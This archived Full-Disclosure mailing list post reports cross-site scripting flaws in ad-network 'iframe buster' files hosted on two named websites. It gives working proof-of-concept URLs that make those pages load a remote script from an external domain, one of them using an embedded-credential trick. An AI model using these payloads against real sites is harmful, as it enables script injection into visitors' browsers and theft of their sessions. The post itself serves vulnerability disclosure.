lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAL+51AV94-h46Vzncnt9kbOMjhrQdFg_cHxWDxPyKTLdyLpKsQ@mail.gmail.com> Date: Wed, 25 Jul 2018 12:06:24 +0200 From: Zmx <larouanne@...il.com> To: fulldisclosure@...lists.org Subject: [FD] More - Google supported XSS kit aka AdExchange iframe buster kit (Zmx) Hi, Following the previous report made on XSS on some buster kit provide by Google we have a list of file to remove. I would like to report on two more that "may" be provide by google and are still containing XSS Today: - http://www.frenchtoutou.com/kit_ftt/lycos/smartadserver/iframeout.html?sas_script_url=https://bgtian.life/xss.js - http://armorgames.com/saymedia/iframebuster.html?tagurl=https://127.0.0.1:pass@bgtian.life/xss.js (doesn't work in chrome because of a little trick on the postMessage :p and https://www.chromestatus.com/feature/5718547946799104 Regards, Zmx _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/